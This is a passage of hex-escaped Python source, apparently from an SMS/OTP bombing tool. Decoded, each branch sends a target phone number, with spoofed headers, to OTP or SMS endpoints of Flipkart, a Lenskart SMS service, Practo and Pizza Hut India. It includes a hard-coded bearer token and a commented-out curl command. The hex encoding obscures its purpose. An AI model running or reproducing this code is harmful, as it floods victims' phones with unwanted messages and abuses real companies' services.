61\x27\x3a\x20\x27\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e
\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x58\x31\x31\x3b\x20\x4c\x69\x6e\x75\x78\x20\x78\x38\x36\x5f\x36\x34\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x52\x65\x66\x65\x72\x65\x72\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x49\x4e\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x39\x2c\x65\x6e\x2d\x47\x42\x3b\x71\x3d\x30\x2e\x38\x2c\x65\x6e\x2d\x55\x53\x3b\x71\x3d\x30\x2e\x37\x2c\x68\x69\x3b\x71\x3d\x30\x2e\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6c\x6f\x67\x69\x6e\x49\x64\x27\x3a\x20\x27\x2b\x27\x2b\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x74\x61\x74\x65\x27\x3a\x20\x27\x56\x45\x52\x49\x46\x49\x45\x44\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x68\x75\x72\x6e
\x45\x6d\x61\x69\x6c\x52\x65\x71\x75\x65\x73\x74\x27\x3a\x20\x27\x66\x61\x6c\x73\x65\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x66\x6c\x69\x70\x6b\x61\x72\x74\x2e\x63\x6f\x6d\x2f\x61\x70\x69\x2f\x35\x2f\x75\x73\x65\x72\x2f\x6f\x74\x70\x2f\x67\x65\x6e\x65\x72\x61\x74\x65\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x63\x6f\x6f\x6b\x69\x65\x73\x3d\x63\x6f\x6f\x6b\x69\x65\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x38\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x77\x77\x77\x2e\x72\x65\x66\x2d\x72\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x72\x76\x3a\x36\x35\x2e\x30\x29\x20\x47\x65\x63\x6b\x6f\x2f\x32\x30\x31\x30\x30\x31\x30\x31\x20\x46\x69\x72\x65\x66\x6f\x78\x2f\x36\x35\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x2c\x20\x2a\x2f\x2a\x3b\x20\x71\x3d\x30\x2e\x30\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x27\x3a\x20\x27\x65\x6e\x2d\x55\x53\x2c\x65\x6e\x3b\x71\x3d\x30\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x20\x27\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x27\x3a\x20\x27\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c\x61\x74\x65\x2c\x20\x62\x72\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x3b\x20\x63\x68\x61\x72\x73\x65\x74\x3d\x55\x54\x46\x2d\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x52\x65\x71\x75\x65\x73\x74\x65\x64\x2d\x57\x69\x74\x68\x27\x3a\x20\x27\x58\x4d\x4c\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x32\x36\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x44\x4e\x54\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20\x27\x6b\x65\x65\x70\x2d\x61\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x73\x75\x62\x6d\x69\x74\x27\x3a\x20\x27\x31\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x27\x3a\x20\x27\x27\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x72\x65\x66\x2d\x72\x2e\x63\x6f\x6d\x2f\x63\x6c\x69\x65\x6e\x74\x73\x2f\x6c\x65\x6e\x73\x6b\x61\x72\x74\x2f\x73\x6d\x73\x41\x70\x69\x27\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20
\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x39\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x27\x3a\x20\x27\x34\x2e\x31\x32\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x50\x49\x2d\x56\x65\x72\x73\x69\x6f\x6e\x27\x3a\x20\x27\x32\x2e\x30\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x73\x61\x6d\x73\x75\x6e\x67\x20\x53\x4d\x2d\x47\x39\x33\x35\x30\x20\x30\x20\x34\x2e\x34\x2e\x32\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x2d\x76\x65\x72\x73\x69\x6f\x6e\x27\x3a\x20\x27\x41\x6e\x64\x72\x6f\x69\x64\x2d\x34\x2e\x31\x32\x2e\x35\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x2d\x43\x4f\x44\x45\x27\x3a\x20\x27\x31\x35\x38\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x41\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x2d\x6e\x61\x6d\x65\x27\x3a\x20\x27\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x27\x3a\x20
\x27\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x39\x36\x27\x7d\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x61\x74\x61\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6c\x69\x65\x6e\x74\x5f\x6e\x61\x6d\x65\x27\x3a\x20\x27\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6d\x6f\x62\x69\x6c\x65\x27\x3a\x20\x27\x2b\x27\x2b\x63\x63\x2b\x70\x6e\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x66\x69\x6e\x67\x65\x72\x70\x72\x69\x6e\x74\x27\x3a\x20\x27\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x64\x65\x76\x69\x63\x65\x5f\x6e\x61\x6d\x65\x27\x3a\x27\x73\x61\x6d\x73\x75\x6e\x67\x2b\x53\x4d\x2d\x47\x39\x33\x35\x30\x27\x7d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x70\x6f\x6e\x73\x65\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x73\x2e\x70\x6f\x73\x74\x28\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x2f\x73\x65\x6e\x64\x5f\x6f\x74\x70\x22\x2c\x20\x68\x65\x61\x64\x65\x72\x73\x3d\x68\x65\x61\x64\x65\x72\x73\x2c\x20\x64\x61\x74\x61\x3d\x64\x61\x74\x61\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x3d\x72\x65\x73\x70\x6f\x6e\x73\x65\x2e\x74\x65\x78\x74\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x23\x20\x72\x64\x20\x3d\x20\x6f\x73\x2e\x70\x6f\x70\x65\x6e\x28\x27\x63\x75\x72\x6c\x20\x2d\x73\x20\x2d\x58\x20\x50\x4f\x53\x54\x20\x2d\x48\x20\x22\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x3a\x34\x2e\x31\x32\x2e\x35\x22\x20\x2d\x48\x20\x22\x41\x50\x49\x2d\x56\x65\x72\x73\x69\x6f\x6e\x3a\x32\x2e\x30\x22\x20\x2d\x48\x20\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x3a\x73\x61\x6d\x73\x75\x6e\x67\x20\x53\x4d\x2d\x47\x39\x33\x35\x30\x20\x30\x20\x34\x2e\x34\x2e\x32\x22\x20\x2d\x48\x20\x22\x63\x6c\x69\x65\x6e\x74\x2d\x76\x65\x72\x73\x69\x6f\x6e\x3a\x41\x6e\x64\x72
\x6f\x69\x64\x2d\x34\x2e\x31\x32\x2e\x35\x22\x20\x2d\x48\x20\x22\x58\x2d\x44\x52\x4f\x49\x44\x2d\x56\x45\x52\x53\x49\x4f\x4e\x2d\x43\x4f\x44\x45\x3a\x31\x35\x38\x22\x20\x2d\x48\x20\x22\x41\x63\x63\x65\x70\x74\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x22\x20\x2d\x48\x20\x22\x63\x6c\x69\x65\x6e\x74\x2d\x6e\x61\x6d\x65\x3a\x50\x72\x61\x63\x74\x6f\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x41\x70\x70\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64\x65\x64\x22\x20\x2d\x48\x20\x22\x48\x6f\x73\x74\x3a\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x22\x20\x2d\x48\x20\x22\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x39\x36\x22\x20\x2d\x64\x20\x20\x22\x63\x6c\x69\x65\x6e\x74\x5f\x6e\x61\x6d\x65\x3d\x50\x72\x61\x63\x74\x6f\x2b\x41\x6e\x64\x72\x6f\x69\x64\x2b\x41\x70\x70\x26\x66\x69\x6e\x67\x65\x72\x70\x72\x69\x6e\x74\x3d\x26\x6d\x6f\x62\x69\x6c\x65\x3d\x25\x32\x42\x27\x20\x2b\x20\x63\x63\x20\x2b\x20\x70\x6e\x20\x2b\x20\x27\x26\x64\x65\x76\x69\x63\x65\x5f\x6e\x61\x6d\x65\x3d\x73\x61\x6d\x73\x75\x6e\x67\x2b\x53\x4d\x2d\x47\x39\x33\x35\x30\x26\x22\x20\x20\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x61\x63\x63\x6f\x75\x6e\x74\x73\x2e\x70\x72\x61\x63\x74\x6f\x2e\x63\x6f\x6d\x2f\x73\x65\x6e\x64\x5f\x6f\x74\x70\x22\x27\x29\x2e\x72\x65\x61\x64\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x74\x75\x72\x6e\x20\x72\x64\x2e\x66\x69\x6e\x64\x28\x22\x73\x75\x63\x63\x65\x73\x73\x22\x29\x20\x21\x3d\x20\x2d\x31\x0a\x20\x20\x20\x20\x65\x6c\x69\x66\x20\x6c\x69\x6d\x20\x3d\x3d\x20\x31\x30\x3a\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x68\x65\x61\x64\x65\x72\x73\x20\x3d\x20\x7b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x48\x6f\x73\x74\x27\x3a\x20\x27\x6d\x2e\x70\x69
\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x6c\x65\x6e\x67\x74\x68\x27\x3a\x20\x27\x31\x31\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x68\x74\x74\x70\x73\x3a\x2f\x2f\x6d\x2e\x70\x69\x7a\x7a\x61\x68\x75\x74\x2e\x63\x6f\x2e\x69\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x75\x74\x68\x6f\x72\x69\x7a\x61\x74\x69\x6f\x6e\x27\x3a\x20\x27\x42\x65\x61\x72\x65\x72\x20\x5a\x58\x6c\x4b\x61\x47\x4a\x48\x59\x32\x6c\x50\x61\x55\x70\x4a\x56\x58\x70\x4a\x4d\x55\x35\x70\x53\x58\x4e\x4a\x62\x6c\x49\x31\x59\x30\x4e\x4a\x4e\x6b\x6c\x72\x63\x46\x68\x57\x51\x30\x6f\x35\x4c\x6d\x56\x35\x53\x6d\x74\x5a\x57\x46\x4a\x6f\x53\x57\x70\x77\x4e\x30\x6c\x75\x55\x6e\x5a\x68\x4d\x6c\x5a\x31\x53\x57\x70\x76\x61\x57\x49\x7a\x51\x58\x68\x69\x52\x30\x70\x79\x5a\x45\x63\x78\x62\x47\x52\x59\x53\x54\x42\x4e\x57\x45\x4a\x79\x54\x6c\x52\x47\x4e\x57\x4e\x71\x51\x6a\x42\x6b\x62\x55\x5a\x73\x53\x57\x6c\x33\x61\x56\x6c\x59\x56\x6a\x42\x68\x51\x30\x6b\x32\x53\x57\x31\x57\x4e\x56\x4e\x71\x51\x6d\x78\x58\x52\x55\x5a\x77\x56\x44\x4a\x73\x53\x31\x4d\x78\x57\x58\x68\x56\x56\x32\x78\x4e\x55\x54\x42\x77\x62\x31\x6c\x72\x5a\x47\x70\x68\x56\x54\x6c\x77\x55\x32\x74\x73\x56\x6d\x56\x72\x61\x33\x68\x55\x62\x57\x78\x4c\x54\x31\x4d\x31\x62\x47\x56\x56\x63\x44\x46\x58\x56\x6d\x4e\x34\x59\x6b\x64\x47\x57\x46\x56\x58\x62\x46\x42\x68\x56\x57\x74\x33\x56\x47\x74\x53\x62\x6d\x46\x56\x65\x45\x52\x54\x62\x6d\x52\x71\x59\x6c\x64\x34\x4d\x46\x64\x57\x61\x45\x74\x4f\x56\x6d\x39\x36\x55\x32\x35\x61\x61\x31\x64\x46\x53\x6a\x5a\x5a\x56\x6d\x52\x53\x59\x56\x55\x35\x63\x46\x4e\x55\x56\x6c\x42\x53\x4d\x55\x59\x30\x56\x44\x42\x6b\x55\x6b\x35\x46\x4d\x58\x42\x4e\x56\x32\x78\x61\x56\x6b\x5a\x56\x4d\x56\x52\x47\x55\x6c\x4a\x4f\x56\x54\x56\x56\x57\x54\x4e\x53\x55\x46\x59\x77\x4d\x44\x46\x55\x56\x32\x74\x33\x5a\x57\x78\x77\x63\x56\x70\x36\x56\x6b\x35\x68\x61
\x30\x56\x36\x56\x31\x5a\x53\x54\x6b\x31\x47\x63\x48\x46\x58\x56\x32\x78\x4e\x55\x54\x42\x77\x64\x31\x6c\x36\x54\x6b\x35\x68\x56\x54\x6c\x77\x55\x32\x30\x35\x61\x31\x4e\x47\x53\x6a\x4e\x55\x4d\x6d\x73\x30\x5a\x47\x31\x52\x65\x6c\x70\x45\x54\x6b\x31\x69\x56\x45\x5a\x76\x57\x54\x49\x31\x55\x32\x4e\x57\x62\x46\x68\x55\x62\x6b\x70\x4e\x59\x6c\x55\x31\x4d\x6c\x6c\x73\x54\x54\x56\x68\x4d\x58\x42\x5a\x56\x32\x31\x34\x61\x56\x4a\x36\x62\x44\x4e\x58\x62\x47\x68\x4c\x59\x55\x64\x4f\x53\x47\x45\x79\x62\x45\x31\x52\x4d\x48\x42\x76\x57\x6b\x5a\x6b\x55\x6d\x46\x56\x4f\x58\x42\x54\x62\x54\x6c\x72\x55\x30\x5a\x4b\x4d\x31\x51\x79\x61\x7a\x52\x6b\x62\x56\x46\x36\x57\x6b\x52\x4f\x54\x57\x4a\x55\x52\x6d\x39\x5a\x4d\x6a\x56\x54\x59\x31\x5a\x73\x57\x46\x52\x75\x53\x6b\x31\x69\x56\x54\x55\x79\x57\x57\x78\x4e\x4e\x57\x45\x78\x63\x46\x6c\x58\x62\x58\x68\x70\x55\x6e\x70\x73\x4d\x31\x64\x73\x61\x45\x74\x68\x52\x30\x35\x49\x59\x54\x4a\x73\x54\x56\x45\x77\x63\x48\x4e\x61\x56\x57\x68\x43\x59\x56\x55\x35\x63\x56\x4a\x55\x52\x6b\x39\x57\x52\x33\x4d\x78\x56\x47\x35\x77\x61\x6b\x31\x56\x4d\x55\x56\x56\x57\x45\x35\x4b\x59\x6c\x52\x57\x63\x46\x64\x74\x62\x45\x70\x4f\x61\x7a\x46\x56\x56\x6c\x52\x47\x55\x46\x5a\x48\x63\x33\x70\x55\x57\x48\x42\x79\x5a\x44\x41\x31\x53\x55\x31\x44\x4e\x56\x52\x61\x4d\x31\x70\x34\x55\x6d\x78\x4f\x5a\x6c\x64\x74\x54\x54\x4e\x61\x53\x45\x35\x70\x54\x56\x64\x53\x4e\x47\x4a\x57\x56\x6b\x64\x6b\x53\x45\x45\x78\x59\x57\x35\x57\x4d\x6b\x39\x46\x4e\x54\x56\x57\x65\x6b\x49\x79\x5a\x44\x45\x35\x54\x56\x52\x75\x54\x6b\x4a\x4e\x62\x57\x68\x47\x56\x6b\x56\x30\x65\x6b\x6c\x70\x64\x32\x6c\x6b\x57\x45\x4a\x72\x57\x56\x68\x53\x62\x46\x70\x44\x53\x54\x5a\x4e\x56\x46\x55\x78\x54\x31\x52\x72\x4d\x30\x31\x36\x61\x33\x64\x4f\x52\x46\x55\x78\x54\x6e\x6c\x33\x61\x57\x52\x59\x54\x6d\x78\x6a\x61\x32\x78\x72\x53\x57\x70\x76\x61\x55\x31\x45\x51\x58\x64\x4e\x52\x45\x46\x33\x54\x55\x52\x42\x64\x45\x31\x45\x51\x58\x64\x4e\x51\x7a\x42\x33\x54\x55\x52\x42\x64\x30\x78\x55\x51\x58\x64\x4e\x52\x45\x46\x30\x54
\x55\x52\x42\x64\x30\x31\x45\x51\x58\x64\x4e\x52\x45\x46\x33\x54\x55\x52\x42\x64\x30\x6c\x70\x64\x32\x6c\x61\x4d\x6c\x5a\x31\x57\x6c\x68\x4b\x61\x47\x52\x48\x56\x6d\x74\x4a\x61\x6d\x39\x34\x54\x6c\x52\x56\x4e\x55\x39\x55\x59\x33\x70\x50\x56\x45\x45\x77\x54\x6c\x52\x56\x4d\x32\x5a\x54\x64\x32\x6c\x68\x56\x30\x59\x77\x53\x57\x70\x76\x65\x45\x35\x55\x56\x54\x56\x50\x56\x47\x4e\x36\x54\x31\x52\x42\x4d\x45\x78\x44\x53\x6d\x78\x6c\x53\x45\x46\x70\x54\x32\x70\x46\x4d\x55\x35\x71\x51\x54\x52\x4e\x65\x6d\x4d\x31\x54\x55\x52\x53\x4f\x53\x35\x43\x4d\x47\x52\x31\x4e\x46\x6c\x45\x51\x56\x70\x74\x54\x47\x4e\x55\x4d\x30\x5a\x48\x4d\x30\x52\x70\x53\x6e\x51\x78\x4e\x33\x52\x7a\x52\x47\x6c\x4a\x61\x56\x5a\x6b\x55\x46\x6c\x34\x5a\x48\x49\x79\x56\x7a\x6c\x74\x65\x6e\x6b\x34\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x78\x2d\x73\x6f\x75\x72\x63\x65\x2d\x6f\x72\x69\x67\x69\x6e\x27\x3a\x20\x27\x50\x57\x41\x46\x57\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x63\x6f\x6e\x74\x65\x6e\x74\x2d\x74\x79\x70\x65\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x61\x63\x63\x65\x70\x74\x27\x3a\x20\x27\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a\x73\x6f\x6e\x2c\x20\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x2c\x20\x2a\x2f\x2a\x27\x2c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x27\x75\x73\x65\x72\x2d\x61\x67\x65\x6e\x74\x27\x3a\x20\x27\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x4c\x69\x6e\x75\x78\x3b\x20\x41\x6e\x64\x72\x6f\x69\x64\x20\x38\x2e\x31\x2e\x30\x3b\x20\x76\x69\x76\x6f\x20\x31\x37\x31\x38\x29\x20\x41\x70\x70\x6c\x65\x57\x65\x62\x4b\x69\x74\x2f\x35\x33\x37\x2e\x33\x36\x20\x28\x4b\x48\x54\x4d\x4c\x2c\x20\x6c\x69\x6b\x65\x20\x47\x65\x63\x6b\x6f\x29\x20\x43\x68\x72\x6f\x6d\x65\x2f\x37\x34\x2e\x30\x2e\x33\x37\x32\x39\x2e\x31\x35\x37\x20\x4d\x6f\x62\x69\x6c\x65\x20\x53\x61\x66\x61\x72\x69\x2f\x35\x33\x37\x2e\x33\x36\x27\x2c\x0a\x20\x20\x20
